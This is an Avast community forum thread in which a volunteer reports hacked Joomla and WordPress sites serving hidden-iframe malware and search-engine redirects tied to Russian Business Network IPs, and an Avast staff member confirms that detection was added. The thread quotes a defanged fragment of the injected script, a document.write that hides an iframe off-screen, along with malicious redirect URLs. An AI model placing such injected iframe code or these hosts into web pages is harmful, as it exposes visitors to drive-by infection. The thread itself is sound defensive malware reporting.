Avast community forum
Home
Help
Search
Login
Register
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
iFrame malware not blocked on RBN IP?
« previous
next »
Print
Pages: [
1
]
Go Down
Author
Topic: iFrame malware not blocked on RBN IP? (Read 1789 times)
0 Members and 2 Guests are viewing this topic.
polonus
Avast Überevangelist
Probably Bot
Posts: 34051
malware fighter
iFrame malware not blocked on RBN IP?
«
on:
March 19, 2014, 10:40:34 PM »
See:
http://killmalware.com/avbuild.ru/#
Javascript malware and Joomla CMS outdated:
http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Favbuild.ru%2F
Nothing here:
http://urlquery.net/report.php?id=1395264242189
Javascript Check: Suspicious
<base href="
http://avbuild.ru/
" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywor...
Included scripts:
suspect - please check list for unknown includes
htxp://avbuild.ru/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=2&sl=1
Suspicious Script:
avbuild dot ru//media/system/js/caption.js
document.write('<iframe src="htxp://uuuujecker.stelleinternational.com.au/hrtwegdshj.cgi?17" style="position:absolute;left'+':'+'-'+'1400'+'
SE visitors redirects
Visitors from search engines are redirected
to: htxp://decmexico.com/includes/domit/1.php -Bitdefender's TrafficLight blocks, also see:
https://www.mywot.com/en/scorecard/decmexico.com?utm_source=addon&utm_content=popup-donuts
177 sites infected with redirects to this URL ->
http://urlquery.net/report.php?id=1395265142800
Listed at DNS-BH / malwaredomains.com severity 2 - see the yellow Requests and Responses.
Most malware for IP now dead:
http://support.clean-mx.de/clean-mx/viruses.php?ip=89.111.176.135&sort=first%20desc
.
IDS alert IP for "ET RBN Known Russian Business Network IP group 401" & "ET RBN Known Russian Business Network IP group 356".
pol
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
polonus
Avast Überevangelist
Probably Bot
Posts: 34051
malware fighter
Re: iFrame malware not blocked on RBN IP?
«
Reply #1 on:
March 19, 2014, 11:14:53 PM »
In the following sample the iFrame seems to be blocked or dead:
http://killmalware.com/opal.net.ua/#
See:
http://62.67.194.183/clean-mx/viruses.php?domain=in.ua&sort=id%20DESC
Site with outdated CMS and blacklisted on Google:
http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fopal.net.ua%2F
WordPress version outdated: Upgrade required.
No response seen here:
http://urlquery.net/report.php?id=1395266671680
as blocked by Google.
See detailed report:
http://quttera.com/detailed_report/opal.net.ua
polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.
Use NoScript, a limited user account and a virtual machine and be safe(r)!
Tondah
Avast team
Jr. Member
Posts: 52
Re: iFrame malware not blocked on RBN IP?
«
Reply #2 on:
March 20, 2014, 10:39:51 AM »
thank you polonus. detection for iframe added.
Logged
Print
Pages: [
1
]
Go Up
« previous
next »
Avast WEBforum
»
Other
»
Viruses and worms
(Moderators:
Maxx_original
,
misak
) »
iFrame malware not blocked on RBN IP?